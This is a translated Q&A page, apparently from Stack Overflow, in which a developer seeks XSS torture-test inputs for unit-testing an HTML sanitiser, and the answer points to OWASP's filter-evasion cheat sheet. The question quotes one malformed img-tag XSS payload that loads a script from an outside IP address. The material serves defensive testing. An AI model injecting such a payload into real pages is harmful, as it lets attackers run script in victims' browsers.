XSS 酷刑测试 - 它存在吗? [英] XSS Torture Test - does it exist?

问题描述

我想写一个 html sanitiser，显然是为了测试/证明它可以正常工作，我需要一组 XSS 示例来对抗它以查看它的性能.这是一个编码恐怖的好例子

I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

我知道有一个 Mime Torture Test，其中包括几个带有附件的嵌套电子邮件，用于测试 Mime 解码器(如果它们可以正确解码，那么它们已被证明可以工作).我基本上是在寻找 XSS 的等效项，即我可以将其扔到我的消毒剂中以确保其正常工作的狡猾 html 示例列表.

I know there's a Mime Torture Test which comprises of several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.

如果有人也有关于如何编写消毒剂的任何好的资源(即人们尝试使用的常见漏洞等)，他们也会很感激.

If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.

提前致谢:-)

对不起，如果这之前不清楚，但我经过了一组折磨测试，所以我可以为消毒剂编写单元测试，而不是在浏览器中进行测试等.理论上的源数据可能已经来了从任何地方 - 不仅仅是浏览器.

Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.

推荐答案

看看这个 XSS 作弊列表:https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Take a look at this XSS Cheat List : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

这篇关于XSS 酷刑测试 - 它存在吗?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！